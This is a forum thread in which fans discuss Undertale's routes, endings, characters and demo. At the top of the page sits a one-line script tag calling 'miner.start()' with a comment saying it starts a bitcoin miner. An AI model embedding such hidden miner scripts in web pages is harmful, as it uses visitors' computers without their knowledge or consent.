<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

Determination.

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Determination.

Postby ohmato » 4 years ago

Undertale thread to section off the FREAKS

also in case anyone's afraid of spoilers
Image
Image
Image
Image
Image

Mikkofier
What about Ron magic?
Posts: 698
Joined: 6 years ago
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his
Location: Lots of miles from Vietnam
Contact:

Re: Determination.

Postby Mikkofier » 4 years ago

I thought I was doing the Pacifist route. Then I fought a Cyriak animation.

Which was weird.
Many people need desperately to receive this message: I feel and think much as you do, care about many of the things you care about, although most people do not care about them. You are not alone.
-Kurt Vonnegut
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Image
Avatar source (for most of them).
Image

User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Re: Determination.

Postby ohmato » 4 years ago

Mikkofier wrote:

I thought I was doing the Pacifist route. Then I fought a Cyriak animation.

Which was weird.
If you mean

Flowey

just keep going, you'll see.
Image
Image
Image
Image
Image

User avatar
Wolfolotl
cryptid
Posts: 732
Joined: 4 years ago
First name: ovid
Pronouns: xe/xem/xyr
Location: big long pointy teeth

Re: Determination.

Postby Wolfolotl » 4 years ago

I love Sans the skeleton he's the best I love his bad puns I love his smile and I want him to have a good fun life
Mikkofier wrote:

I thought I was doing the Pacifist route. Then I fought a Cyriak animation.

Which was weird.

when you do the pacifist route without going to a certain area you get a Neutral End instead of the True End


User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: Determination.

Postby Willhart » 4 years ago

I first hear of this game couple of days after it's release, when it was mentioned on the request thread. The trailer was pretty much enough to sell me on it. It's nice how this game will hopefully introduce more people to these kind of games. The Metacritic score is still 98 as of now, and around 99% of the steam reviews for it are positive. The big review on Giant Bomb was interesting to read too.

Also Slowbeef streamed trough this game multiple times, and has also recommended it on his twitter and so on.

User avatar
FrozenQuills
undefinable flair 2019
Posts: 783
Joined: 4 years ago
Location: my skull

Re: Determination.

Postby FrozenQuills » 4 years ago

The fact that it has the highest ever score of 98 for a PC game on Metacritic right now says something.
Anyway make sure you pet the dog when you get the chance.

Image
Image
Image
Image
SMBX Tileset Compiler and Separator
The boss entry that made me eat a shoe.
Image

5th place counter: 5
(SMBX Forums CC11, SMBX Forums CC12, Endgame Madness Contest, SMWC Kaizo Contest 2016, SMWC 24hr Contest 2018)

User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Re: Determination.

Postby ohmato » 4 years ago

I like to think the hubbub on

W.D. Gaster

is all just a massive trolly dead end set up by Toby.
Image
Image
Image
Image
Image

User avatar
Katazuki
The Return of the Return Of
Posts: 663
Joined: 5 years ago
Pronouns: that guy
Location: ...Where am I?

Re: Determination.

Postby Katazuki » 4 years ago

I honestly wish I could play this game, but I have no means of getting it as of yet.

But I've already spoiled myself on some of the story and the gameplay elements, and to me this is pretty much the equivalent of what Shovel Knight does for Megaman fans. Except in this case, it's Undertale for Earthbound fans.
Image
Image

Wow! Mosts! ☆*。★゚*♪ヾ(☆ゝз・)ノ
Image
Image

User avatar
Dog In Da Grass
Perro De La Cesped
Posts: 459
Joined: 6 years ago
First name: Dog
Pronouns: that dog
Location: Da Grass

Re: Determination.

Postby Dog In Da Grass » 4 years ago

THIS.
GAME.
IS.
AWESOME!

I've been playing way too much of it lately x3
I want to know more about this

Gaster

guy he seems really interesting, likely more of a backstory than a trolly thing.
Sans has got to be my favorite, there's so much more to his character than he'd originally let on through one play-through of the game.

(I also couldn't help but make a few fan characters and enemies, might have to draw them sometime)
:pal: Image :pal:

User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Re: Determination.

Postby ohmato » 4 years ago

Dog In Da Grass wrote:I want to know more about this

Gaster

guy he seems really interesting, likely more of a backstory than a trolly thing.
Sans has got to be my favorite, there's so much more to his character than he'd originally let on through one play-through of the game.
If you are interested in what people have found about him, you can look here, also includes some stuff on sans' backstory. Speculation fuel all around
Image
Image
Image
Image
Image

User avatar
Zpto
Totally not a robot
Posts: 227
Joined: 6 years ago
Pronouns: he/him/his
Location: A village in the middle of nowhere

Re: Determination.

Postby Zpto » 4 years ago

So what's your favorite food item? I'd say the Nice cream but I'm still early in the game there could be better ones
Image

User avatar
Dog In Da Grass
Perro De La Cesped
Posts: 459
Joined: 6 years ago
First name: Dog
Pronouns: that dog
Location: Da Grass

Re: Determination.

Postby Dog In Da Grass » 4 years ago

arabsalmon wrote:
Dog In Da Grass wrote:I want to know more about this

Gaster

guy he seems really interesting, likely more of a backstory than a trolly thing.
Sans has got to be my favorite, there's so much more to his character than he'd originally let on through one play-through of the game.
If you are interested in what people have found about him, you can look here, also includes some stuff on sans' backstory. Speculation fuel all around

That's what originally got me interested in that guy.
I have my own theories about Sans and stuff after having gotten "all" the Major endedings


Zpto wrote:So what's your favorite food item? I'd say the Nice cream but I'm still early in the game there could be better ones
I have to say Dog Salad! (for reasons x3)
But Instant Noodles have the best flavor text when used so it's a tough choice :P
:pal: Image :pal:

Ivy
Posts: 2349
Joined: 5 years ago
Contact:

Re: Determination.

Postby Ivy » 4 years ago

it has been purchased & installed but probably will not be played for a while because animal crossing happy home designer, mario maker, etc. hype is still fresh
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: Determination.

Postby Willhart » 4 years ago

How different is the demo from the proper game? Is it like it's own thing like the demo for Stanley Parable was? I hear it can take some time to play and there might be some unique text, but I would not want to spoil too much of it while I'm searching for that information.

Mikkofier
What about Ron magic?
Posts: 698
Joined: 6 years ago
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his
Location: Lots of miles from Vietnam
Contact:

Re: Determination.

Postby Mikkofier » 4 years ago

Achieved

True Pacifist

ending. My face is leaking.
Many people need desperately to receive this message: I feel and think much as you do, care about many of the things you care about, although most people do not care about them. You are not alone.
-Kurt Vonnegut
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Image
Avatar source (for most of them).
Image

User avatar
Dog In Da Grass
Perro De La Cesped
Posts: 459
Joined: 6 years ago
First name: Dog
Pronouns: that dog
Location: Da Grass

Re: Determination.

Postby Dog In Da Grass » 4 years ago

Willhart wrote:How different is the demo from the proper game? Is it like it's own thing like the demo for Stanley Parable was? I hear it can take some time to play and there might be some unique text, but I would not want to spoil too much of it while I'm searching for that information.
a good 90% of the game takes place after the ruins (and the demo ends before you can get out of the ruins). I haven't played the demo recently but I believe they updated the battle graphics. other than that I think a few texts were changed but the demo still stays pretty much true to the real game you don't have to worry about spoilers unless you're worried about spoiling the first area of the game. Otherwise I say get the demo! It's great and it'll let you know if you're going to like the game.
:pal: Image :pal:

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: Determination.

Postby Willhart » 4 years ago

Dog In Da Grass wrote:
Willhart wrote:How different is the demo from the proper game? Is it like it's own thing like the demo for Stanley Parable was? I hear it can take some time to play and there might be some unique text, but I would not want to spoil too much of it while I'm searching for that information.
a good 90% of the game takes place after the ruins (and the demo ends before you can get out of the ruins). I haven't played the demo recently but I believe they updated the battle graphics. other than that I think a few texts were changed but the demo still stays pretty much true to the real game you don't have to worry about spoilers unless you're worried about spoiling the first area of the game. Otherwise I say get the demo! It's great and it'll let you know if you're going to like the game.
I've already played the game and was mostly just wondering, if the demo would have some content I did not see in the full game.

User avatar
Solaris
flowercuco
Posts: 88
Joined: 4 years ago
Pronouns: they/them/their

Re: Determination.

Postby Solaris » 4 years ago

the demo is just the ruins, so any dialog/content thats different is just like, because theres nothing that comes after

flowey has different dialog wrt your choices i think? but thats the most significant bit
avatar from cucumber quest

/(=✪ x ✪=)\

User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Re: Determination.

Postby ohmato » 4 years ago

Willhart wrote:I've already played the game and was mostly just wondering, if the demo would have some content I did not see in the full game.
I believe the demo actually had a hardmode option included as a joke which was unlocked if you

named your character Frisk

. I'm not sure if the full game continued that, you may wanna fact check it though.
Image
Image
Image
Image
Image

Mikkofier
What about Ron magic?
Posts: 698
Joined: 6 years ago
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his
Location: Lots of miles from Vietnam
Contact:

Re: Determination.

Postby Mikkofier » 4 years ago

I recall the demo having some dialogue with Papyrus and Sans at the end, depending on the ending. Also the manual would change depending on the ending, too.
Many people need desperately to receive this message: I feel and think much as you do, care about many of the things you care about, although most people do not care about them. You are not alone.
-Kurt Vonnegut
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Image
Avatar source (for most of them).
Image

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: Determination.

Postby Willhart » 4 years ago

Mikkofier wrote:I recall the demo having some dialogue with Papyrus and Sans at the end, depending on the ending. Also the manual would change depending on the ending, too.
I might check it out to see the manual at some point. I've seen only couple of other games try something like that.

Ivy
Posts: 2349
Joined: 5 years ago
Contact:

Re: Determination.

Postby Ivy » 4 years ago

haha i get it, he's called sans because he speaks in comic sans, hahahahaha!
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

User avatar
Wolfolotl
cryptid
Posts: 732
Joined: 4 years ago
First name: ovid
Pronouns: xe/xem/xyr
Location: big long pointy teeth

Re: Determination.

Postby Wolfolotl » 4 years ago

actually, he's called sans because your life would not be complete without him

Ivy
Posts: 2349
Joined: 5 years ago
Contact:

Re: Determination.

Postby Ivy » 4 years ago

so far i've been making my first ever run a pacifist run, i wonder how long that will last
eating veggies whole didn't register as killing them, which was nice
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

User avatar
ohmato
hey idiot
Posts: 794
Joined: 4 years ago
Location: location, location
Contact:

Re: Determination.

Postby ohmato » 4 years ago

Wolfolotl wrote:actually, he's called sans because your life would not be complete without him
has anyone ever told you that you are the best
Image
Image
Image
Image
Image


Return to “the cartridgé”

Who is online

Users browsing this forum: No registered users and 9 guests

cron